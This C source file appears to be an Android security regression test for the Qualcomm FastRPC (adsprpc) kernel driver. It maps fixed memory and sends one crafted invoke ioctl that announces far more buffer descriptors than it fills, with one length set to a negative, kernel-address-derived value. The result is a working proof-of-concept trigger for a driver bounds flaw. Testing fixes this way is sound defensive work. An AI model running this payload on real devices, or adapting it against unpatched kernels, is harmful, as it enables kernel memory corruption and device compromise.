| /** |
| * Copyright (C) 2017 The Android Open Source Project |
| * |
| * Licensed under the Apache License, Version 2.0 (the "License"); |
| * you may not use this file except in compliance with the License. |
| * You may obtain a copy of the License at |
| * |
| * http://www.apache.org/licenses/LICENSE-2.0 |
| * |
| * Unless required by applicable law or agreed to in writing, software |
| * distributed under the License is distributed on an "AS IS" BASIS, |
| * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. |
| * See the License for the specific language governing permissions and |
| * limitations under the License. |
| */ |
| |
| #define _GNU_SOURCE |
| #include <fcntl.h> |
| #include <pthread.h> |
| #include <stdint.h> |
| #include <stdio.h> |
| #include <string.h> |
| #include <sys/mman.h> |
| #include <sys/syscall.h> |
| #include <sys/types.h> |
| #include <sys/wait.h> |
| #include <unistd.h> |
| |
/*
 * One argument descriptor: a user-space address together with a byte count.
 * An array of these is referenced by fastrpc_ioctl_invoke.pra.
 *
 * The count is declared as a signed ssize_t, so the caller can supply a
 * negative value; whatever consumes the descriptor has to range-check it.
 */
struct remote_buf {
  void *pv;    /* address of the buffer */
  ssize_t len; /* size of the buffer in bytes (signed) */
};
| |
/*
 * Argument block passed by pointer to the invoke ioctl issued in main().
 *
 * Both `sc` and `pra` are supplied by the caller, so the buffer counts
 * encoded in `sc` (see the REMOTE_SCALARS_* macros in this file) are not
 * tied to how many descriptors `pra` really points at.
 */
struct fastrpc_ioctl_invoke {
  uint32_t handle;        /* remote handle */
  uint32_t sc;            /* scalars word describing the arguments */
  struct remote_buf *pra; /* list of remote argument descriptors */
};
| |
/*
 * Invoke argument block extended with a list of file descriptors.
 * Declared for completeness; main() in this file does not use it.
 */
struct fastrpc_ioctl_invoke_fd {
  struct fastrpc_ioctl_invoke inv; /* base invoke arguments */
  int *fds;                        /* list of file descriptors */
};
| |
/*
 * Scalars word layout used by the two macros below: bits 23..16 hold the
 * input-buffer count and bits 15..8 the output-buffer count. Each field is
 * eight bits wide, so either count ranges from 0 to 255.
 */

/* Retrieves the number of input buffers from the scalars parameter. */
#define REMOTE_SCALARS_INBUFS(sc) (((sc) >> 16) & 0xff)

/* Retrieves the number of output buffers from the scalars parameter. */
#define REMOTE_SCALARS_OUTBUFS(sc) (((sc) >> 8) & 0xff)
| |
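/*
 * Creates an anonymous, private, read/write mapping at exactly `addr`.
 * Returns 0 on success and -1 when mmap() fails (errno is set by mmap).
 */
static int map_fixed_rw(uintptr_t addr, size_t len) {
  void *got = mmap((void *)addr, len, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS, -1, 0);
  return (got == MAP_FAILED) ? -1 : 0;
}

/*
 * Regression test driver: builds one invoke request for /dev/adsprpc-smd
 * whose scalars word announces far more descriptors than are populated,
 * and submits it with a single ioctl.
 *
 * The original ignored every return value, so a failed mmap() made the
 * test fault on its own stores and a missing device node was
 * indistinguishable from a kernel that rejected the request. Each
 * prerequisite is now checked and reported on stderr.
 *
 * The exit status stays 0 on every path, as in the original; how the
 * calling harness judges the outcome is not visible in this file.
 */
int main(void) {
  /* Fixed-address scratch regions, same addresses and sizes as before. */
  static const struct {
    uintptr_t addr;
    size_t len;
  } regions[] = {
      {0x20000000ul, 0x705000ul},
      {0x20705000ul, 0x1000ul},
      {0x20706000ul, 0x1000ul},
      {0x20707000ul, 0x1000ul},
      {0x10000ul, 0x100000ul},
  };
  /* The descriptor array lives in the three single pages at 0x20705000. */
  const size_t desc_area = 3 * 0x1000ul;

  for (size_t i = 0; i < sizeof regions / sizeof regions[0]; i++) {
    if (map_fixed_rw(regions[i].addr, regions[i].len) != 0) {
      perror("mmap");
      return 0;
    }
  }

  int fd = open("/dev/adsprpc-smd", O_RDONLY);
  if (fd < 0) {
    /* Device node absent or not accessible: nothing to exercise. */
    perror("open /dev/adsprpc-smd");
    return 0;
  }

  struct remote_buf *buf = (struct remote_buf *)0x20705000ul;
  struct fastrpc_ioctl_invoke invoke_param = {
      .handle = 5,
      .sc = (uint32_t)0xffffff7f,
      .pra = buf,
  };

  /* 0xff input + 0xff output buffers = 510 descriptors announced. */
  int numbuf = REMOTE_SCALARS_INBUFS(invoke_param.sc) +
               REMOTE_SCALARS_OUTBUFS(invoke_param.sc);

  /* Guard this program's own stores: every announced descriptor, and the
   * highest index written below, must fall inside the mapped pages. */
  if (numbuf <= 509 || (size_t)numbuf * sizeof(*buf) > desc_area) {
    fprintf(stderr, "descriptor array does not fit the mapped area\n");
    close(fd);
    return 0;
  }

  /* Length constant carried over verbatim from the original test. The
   * arithmetic is unsigned and wraps; the result has its top bit set, so
   * it reads as a negative value once stored in the signed len field. */
  size_t ptr = (size_t)(0xffffff800bde0160 + 0x10000 - 0xffffffc000000000);
  ptr = ptr & 0xffffffff000fffff;

  buf[0].pv = (void *)0x10000;
  buf[0].len = 0x1;

  buf[508].pv = 0;
  buf[508].len = ptr;
  buf[509].pv = (void *)0x1ffff;
  buf[509].len = 0;

  /* Request number kept as given. Under the standard Linux ioctl encoding
   * it decodes as _IOWR('R', 1, <16-byte argument>), which matches
   * sizeof(struct fastrpc_ioctl_invoke) on an LP64 target. */
  long rc = syscall(__NR_ioctl, fd, 0xc0105201ul, &invoke_param, 0, 0, 0);
  if (rc == -1) {
    /* NOTE(review): a kernel that validates the request presumably fails
     * it here - confirm the expected errno against the fix under test. */
    perror("ioctl");
  }

  close(fd);
  return 0;
}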